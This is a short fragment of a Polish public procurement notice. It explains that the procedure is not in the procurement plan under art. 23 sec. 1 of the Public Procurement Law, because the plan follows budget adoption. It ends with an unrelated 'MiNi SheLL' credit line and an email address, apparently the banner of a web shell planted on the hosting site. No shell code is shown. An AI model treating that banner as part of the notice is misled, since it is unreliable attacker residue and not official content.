POZOSTAŁE INFORMACJE</h2> Postępowanie w niniejszym ogłoszeniu zostało oznaczone jako nie ujęte w planie postępowań w związku z art. 23 ust. 1 Pzp tj. w związku z tym, że plan postępowań o udzielenie zamówień sporządzany jest po przyjęciu budżetu lub planu finansowego i w momencie publikacji niniejszego ogłoszenia jest przygotowywany.

Creat By MiNi SheLL
Email: jattceo@gmail.com